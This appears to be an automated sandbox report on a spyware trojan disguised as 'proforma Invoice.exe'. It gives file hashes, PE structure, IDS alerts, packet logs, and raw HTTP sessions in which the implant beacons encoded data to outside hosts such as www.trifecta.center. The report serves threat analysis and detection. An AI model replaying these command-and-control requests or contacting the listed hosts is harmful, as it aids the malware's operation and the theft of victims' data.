                                                                        Sample name:proforma Invoice.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@7/2@12/9
                                                                        EGA Information:
                                                                        • Successful, ratio: 75%
                                                                        HCA Information:
                                                                        • Successful, ratio: 91%
                                                                        • Number of executed functions: 96
                                                                        • Number of non-executed functions: 277
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: proforma Invoice.exe
Time      Type             Description
04:08:54  API Interceptor  2x Sleep call for process: proforma Invoice.exe modified
04:10:15  API Interceptor  8964426x Sleep call for process: EhStorAuthn.exe modified
                                                                        Process:C:\Users\user\Desktop\proforma Invoice.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1216
                                                                        Entropy (8bit):5.34331486778365
                                                                        Encrypted:false
                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                        Malicious:true
                                                                        Reputation:high, very likely benign file
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                        Process:C:\Windows\SysWOW64\EhStorAuthn.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                        Category:dropped
                                                                        Size (bytes):196608
                                                                        Entropy (8bit):1.121297215059106
                                                                        Encrypted:false
                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):7.603276868340257
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        File name:proforma Invoice.exe
                                                                        File size:972'288 bytes
                                                                        MD5:3757282ce10c90df6d5e364e22975534
                                                                        SHA1:7b1b6eca6f742cfc044a83c433a506302b1d277e
                                                                        SHA256:519e372bb8026c5aea93a6d44aefb4b08eb23731f2f902ae35866c5d6cc3dd97
                                                                        SHA512:51ce74f7e6a9e8e151bda63a240df98d207d686967d6cd8f2d780d4fe2f24f73b053547c3a50aeb6722446f0765674adff4a7260cca91a5374d238a0c0b47c15
                                                                        SSDEEP:24576:IW2t5ssmGMoigAGFDNMXTss0oll2pHX2u/:IW23UGMoZACmDsTollMG
                                                                        TLSH:3225BED03A21AB19DE6D8BB8C159DD7483B01D657006FBAE5DD83BD738B9320A908F47
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@+g..............0......P........... ........@.. .......................@............@................................
                                                                        Icon Hash:1365d6b2924c718f
                                                                        Entrypoint:0x4ea3b6
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x672B40DD [Wed Nov 6 10:11:41 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xea364 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xec000 | 0x4ce4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf2000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xe83fc | 0xe8400 | a91509f2a7e62a836bb1a06689808b72 | False | 0.8058490732642627 | OpenPGP Public Key | 7.599057364537114 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xec000 | 0x4ce4 | 0x4e00 | d80676686d01e9e8494710f3e9978936 | False | 0.9481670673076923 | data | 7.832001351047935 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf2000 | 0xc | 0x200 | 7dd7a0d435d5dff554e2c75b0c714fd7 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xec0c8 | 0x48cd | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.991039330364329
RT_GROUP_ICON | 0xf09a8 | 0x14 | data | | | 1.05
RT_VERSION | 0xf09cc | 0x314 | data | | | 0.4149746192893401
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-07T10:09:14.534827+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.5 | 49709 | TCP
2024-11-07T10:09:53.290899+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.5 | 49922 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                        Nov 7, 2024 10:11:29.885473967 CET80499963.33.130.190192.168.2.5
                                                                        Nov 7, 2024 10:11:29.885776043 CET4999680192.168.2.53.33.130.190
                                                                        Nov 7, 2024 10:11:29.888478994 CET4999680192.168.2.53.33.130.190
                                                                        Nov 7, 2024 10:11:29.894316912 CET80499963.33.130.190192.168.2.5
                                                                        Nov 7, 2024 10:11:35.634838104 CET4999780192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:35.639688969 CET8049997103.191.208.137192.168.2.5
                                                                        Nov 7, 2024 10:11:35.639753103 CET4999780192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:35.653068066 CET4999780192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:35.657877922 CET8049997103.191.208.137192.168.2.5
                                                                        Nov 7, 2024 10:11:37.156815052 CET4999780192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:37.163405895 CET8049997103.191.208.137192.168.2.5
                                                                        Nov 7, 2024 10:11:37.163460016 CET4999780192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:38.207954884 CET4999880192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:38.212951899 CET8049998103.191.208.137192.168.2.5
                                                                        Nov 7, 2024 10:11:38.213112116 CET4999880192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:38.225048065 CET4999880192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:38.229868889 CET8049998103.191.208.137192.168.2.5
                                                                        Nov 7, 2024 10:11:39.735009909 CET4999880192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:39.740359068 CET8049998103.191.208.137192.168.2.5
                                                                        Nov 7, 2024 10:11:39.740432978 CET4999880192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:40.753565073 CET4999980192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:40.758635998 CET8049999103.191.208.137192.168.2.5
                                                                        Nov 7, 2024 10:11:40.761208057 CET4999980192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:40.773072958 CET4999980192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:40.778578043 CET8049999103.191.208.137192.168.2.5
                                                                        Nov 7, 2024 10:11:40.778603077 CET8049999103.191.208.137192.168.2.5
                                                                        Nov 7, 2024 10:11:42.281928062 CET4999980192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:42.287211895 CET8049999103.191.208.137192.168.2.5
                                                                        Nov 7, 2024 10:11:42.291285992 CET4999980192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:43.300376892 CET5000080192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:43.305335045 CET8050000103.191.208.137192.168.2.5
                                                                        Nov 7, 2024 10:11:43.305440903 CET5000080192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:43.312668085 CET5000080192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:43.317537069 CET8050000103.191.208.137192.168.2.5
                                                                        Nov 7, 2024 10:11:46.135535955 CET8050000103.191.208.137192.168.2.5
                                                                        Nov 7, 2024 10:11:46.187967062 CET5000080192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:46.614490032 CET8050000103.191.208.137192.168.2.5
                                                                        Nov 7, 2024 10:11:46.614644051 CET5000080192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:46.615639925 CET5000080192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:46.615866899 CET8050000103.191.208.137192.168.2.5
                                                                        Nov 7, 2024 10:11:46.617147923 CET5000080192.168.2.5103.191.208.137
                                                                        Nov 7, 2024 10:11:46.620479107 CET8050000103.191.208.137192.168.2.5
                                                                        Nov 7, 2024 10:11:52.439766884 CET5000180192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:52.444689035 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:52.444926977 CET5000180192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:52.456267118 CET5000180192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:52.461158037 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:53.500350952 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:53.500375986 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:53.500408888 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:53.500420094 CET5000180192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:53.500612974 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:53.500633001 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:53.500644922 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:53.500652075 CET5000180192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:53.500683069 CET5000180192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:53.501084089 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:53.501096964 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:53.501110077 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:53.501133919 CET5000180192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:53.501507044 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:53.501549959 CET5000180192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:53.505459070 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:53.505573034 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:53.505585909 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:53.505614042 CET5000180192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:53.547363043 CET5000180192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:53.634893894 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:53.634998083 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:53.635006905 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:53.635194063 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:53.635198116 CET5000180192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:53.635205984 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:53.635216951 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:53.635263920 CET5000180192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:53.635284901 CET5000180192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:53.770713091 CET8050001183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:53.770867109 CET5000180192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:53.969666958 CET5000180192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:54.989226103 CET5000280192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:54.994422913 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:54.994503975 CET5000280192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:55.008482933 CET5000280192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:55.013695955 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:56.038858891 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:56.038903952 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:56.038994074 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:56.039038897 CET5000280192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:56.039150953 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:56.039170980 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:56.039488077 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:56.039495945 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:56.039511919 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:56.039573908 CET5000280192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:56.039875984 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:56.039885998 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:56.043302059 CET5000280192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:56.043905973 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:56.043998957 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:56.044013023 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:56.044214964 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:56.044414997 CET5000280192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:56.176839113 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:56.176939011 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:56.176945925 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:56.177084923 CET5000280192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:56.177238941 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:56.177247047 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:56.181194067 CET5000280192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:56.314133883 CET8050002183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:56.314322948 CET5000280192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:56.516247034 CET5000280192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:57.535888910 CET5000380192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:57.540795088 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:57.540894032 CET5000380192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:57.554179907 CET5000380192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:57.559011936 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:57.559127092 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.649674892 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.649719954 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.649755955 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.649880886 CET5000380192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:58.649944067 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.649951935 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.649969101 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.650058031 CET5000380192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:58.650259972 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.650270939 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.650285006 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.650294065 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.650372982 CET5000380192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:58.650372982 CET5000380192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:58.654813051 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.654870987 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.654936075 CET5000380192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:58.654988050 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.654994965 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.655116081 CET5000380192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:58.791040897 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.791096926 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.791111946 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.791249037 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.791266918 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.791321039 CET5000380192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:58.791321039 CET5000380192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:58.791435003 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.791528940 CET5000380192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:58.932893038 CET8050003183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:11:58.932960033 CET5000380192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:11:59.063116074 CET5000380192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:12:00.083095074 CET5000480192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:12:00.088192940 CET8050004183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:12:00.088402033 CET5000480192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:12:00.099173069 CET5000480192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:12:00.104052067 CET8050004183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:12:01.101988077 CET8050004183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:12:01.156740904 CET5000480192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:12:01.242021084 CET8050004183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:12:01.242160082 CET5000480192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:12:01.243443966 CET5000480192.168.2.5183.90.181.102
                                                                        Nov 7, 2024 10:12:01.249161959 CET8050004183.90.181.102192.168.2.5
                                                                        Nov 7, 2024 10:12:06.661238909 CET5000580192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:06.666136980 CET805000567.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:06.666409016 CET5000580192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:06.677499056 CET5000580192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:06.682384014 CET805000567.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:07.339900017 CET805000567.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:07.377998114 CET805000567.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:07.378072977 CET5000580192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:08.188173056 CET5000580192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:09.207712889 CET5000680192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:09.212620020 CET805000667.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:09.212696075 CET5000680192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:09.226202965 CET5000680192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:09.231214046 CET805000667.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:09.891572952 CET805000667.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:09.930969954 CET805000667.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:09.931323051 CET5000680192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:10.737122059 CET5000680192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:11.754673958 CET5000780192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:11.759658098 CET805000767.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:11.759782076 CET5000780192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:11.773761034 CET5000780192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:11.778786898 CET805000767.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:11.778837919 CET805000767.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:12.447926998 CET805000767.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:12.486129999 CET805000767.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:12.486524105 CET5000780192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:13.282228947 CET5000780192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:14.305124998 CET5000880192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:14.310138941 CET805000867.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:14.310245991 CET5000880192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:14.323975086 CET5000880192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:14.328834057 CET805000867.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:14.994524002 CET805000867.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:15.032691002 CET805000867.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:15.032840967 CET5000880192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:15.033982992 CET5000880192.168.2.567.223.117.142
                                                                        Nov 7, 2024 10:12:15.038764000 CET805000867.223.117.142192.168.2.5
                                                                        Nov 7, 2024 10:12:20.465137959 CET5000980192.168.2.5206.119.81.36
                                                                        Nov 7, 2024 10:12:20.470004082 CET8050009206.119.81.36192.168.2.5
                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        0 | 192.168.2.5 | 49920 | 3.33.130.190 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:09:51.650985956 CET | 358 | OUT | GET /4d7f/?yx-=dF9dYX9pQR-xIhFp&N6gPj2W=GYb0rmyr/JAlLZNhnt/PbSIY/4LKqg5t8esebmIUXrwcEcXD+HGwSEbbxHn9xefIHUHI8DRuA6hSDuYZVaPcSdBlDCtcl1FCkIwA6S5urJUXpT4lrZ2q29hRsWK9NvLVVQ== HTTP/1.1
                                                                        Host: www.trifecta.center
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:09:53.221529961 CET | 416 | IN | HTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Thu, 07 Nov 2024 09:09:53 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 276
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?yx-=dF9dYX9pQR-xIhFp&N6gPj2W=GYb0rmyr/JAlLZNhnt/PbSIY/4LKqg5t8esebmIUXrwcEcXD+HGwSEbbxHn9xefIHUHI8DRuA6hSDuYZVaPcSdBlDCtcl1FCkIwA6S5urJUXpT4lrZ2q29hRsWK9NvLVVQ=="}</script></head></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        1 | 192.168.2.5 | 49981 | 52.20.84.62 | 80 | 2276 | C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 10:10:08.503473997 CET | 603 | OUT | POST /qfwu/ HTTP/1.1
